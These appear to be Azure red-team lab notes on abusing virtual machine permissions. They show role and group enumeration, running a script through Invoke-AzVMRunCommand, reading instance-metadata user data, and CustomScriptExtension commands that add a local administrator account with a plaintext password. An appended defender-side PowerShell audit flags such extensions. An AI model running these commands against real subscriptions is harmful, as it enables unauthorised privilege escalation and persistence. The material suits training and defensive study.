Azure Virtual Machines
Enumerating Administrative Users
Get-AzRoleAssignment #see executor
Get-AzVM
Get-AzVM -Name bkpadconnect
Get-AzVM -Name bkpadconnect | select -ExpandProperty NetworkProfile
Get-AzNetworkInterface -Name bkpadconnect368
Get-AzPublicIpAddress -Name bkpadconnectIP
Get-AzResource
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
Get-AzADGroup -DisplayName 'VM Admins'
Get-AzADGroupMember -GroupDisplayName 'VM Admins' | select DisplayName
abuse command execution on VM
Invoke-AzVMRunCommand -VMName bkpadconnect -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath 'C:\AzAD\Tools\adduser.ps1' -Verbose
abuse user data attached to VM
- user data
- Azure Instance Metadata Service
- not encrypted, any process on the VM can read this
- must be base64-encoded and cannot exceed 64 KB
- can be written with permission
Microsoft.Compute/virtualMachines/write
- default number of machines that a user can join to domain: 10
Get User Data:
$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
adding custom script extension to VMs
- OMIGOD!
- custom script extension is used to run scripts on Azure VMs
- executed with SYSTEM privileges
- adding or updating an extension requires
Microsoft.Compute/virtualMachines/extensions/write
- note: on virtual machines, Get-AzRoleAssignment might not be sufficient (it can come back empty even when you hold extension rights) → check effective permissions with direct HTTP calls
PS> Get-AzVMExtension
PS> Set-AzVMExtension -VMName "infradminsrv" -ResourceGroupName "Research" -Location "Germany West Central" -ExtensionName "ExecCmd" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users student1 Stud1Password@123 /add /Y; net localgroup administrators student1 /add"}'
PS> Enter-PSSession -Session $infradminsrv # fails with cannot enter another session
PS> Invoke-Command -Session $infradminsrv -ScriptBlock {whoami;hostname}
# dsregcmd /status
Get-AzResource # see VM
Get-AzRoleAssignment # empty
# but I see 'execcmd', isn't that enough?
# we see extensions/read and extensions/write
# check extensions
Get-AzVMExtension -ResourceGroupName 'Research' -VMName 'infradminsrv'
# use it to create a new user
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users student64 Stud64Password@123 /add /Y; net localgroup administrators student64 /add"}'
We can also use REST calls for enumeration:
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
{Microsoft.Compute/virtualMachines/extensions/write, Microsoft.Compute/virtualMachines/extensions/read}
Get-AzVMExtension -ResourceGroupName "Research" -VMName "infradminsrv"
Add a new Extension!
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users student27 Stud27Password@123 /add /Y; net localgroup administrators student27 /add"}'
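Added example, not part of these notes: a defender-side audit built on the same Az cmdlets the notes use. It walks every VM in the current subscription, lists its extensions and flags the types that run commands as SYSTEM/root (CustomScriptExtension and friends), decoding commandToExecute so a reviewer can see exactly what was pushed to a host such as infradminsrv. The function name Get-RiskyVMExtensions and the list of risky types are my own choices; it assumes a Connect-AzAccount session with read access to the VMs.

```powershell
# Audit helper (added example, assumed names): inventory VM extensions and flag
# the ones that execute arbitrary commands. Useful because a role assignment
# listing can be empty while extension artifacts (e.g. "ExecCmd") still exist.
function Get-RiskyVMExtensions {
    [CmdletBinding()]
    param(
        # Extension types that execute attacker-supplied commands/scripts as SYSTEM or root
        [string[]]$RiskyTypes = @('CustomScriptExtension', 'CustomScript', 'VMAccessAgent', 'VMAccessForLinux')
    )
    foreach ($vm in Get-AzVM) {
        $exts = Get-AzVMExtension -ResourceGroupName $vm.ResourceGroupName -VMName $vm.Name -ErrorAction SilentlyContinue
        foreach ($ext in $exts) {
            # Settings is a JSON string; pull commandToExecute when present, otherwise keep raw text
            $cmd = $null
            if ($ext.Settings) {
                try   { $cmd = ($ext.Settings | ConvertFrom-Json).commandToExecute }
                catch { $cmd = $ext.Settings }
            }
            [pscustomobject]@{
                VM            = $vm.Name
                ResourceGroup = $vm.ResourceGroupName
                Extension     = $ext.Name
                Type          = $ext.ExtensionType
                Publisher     = $ext.Publisher
                Version       = $ext.TypeHandlerVersion
                State         = $ext.ProvisioningState
                Risky         = ($ext.ExtensionType -in $RiskyTypes)
                Command       = $cmd
            }
        }
    }
}

# Review only the flagged entries; anything with a commandToExecute that adds
# local users or touches the administrators group deserves an incident ticket.
Get-RiskyVMExtensions | Where-Object Risky | Format-Table VM, Extension, Type, State, Command -AutoSize
```

Pair this with an alert on the Microsoft.Compute/virtualMachines/extensions/write operation in the Activity Log, since the extension can be deleted again after the command has run.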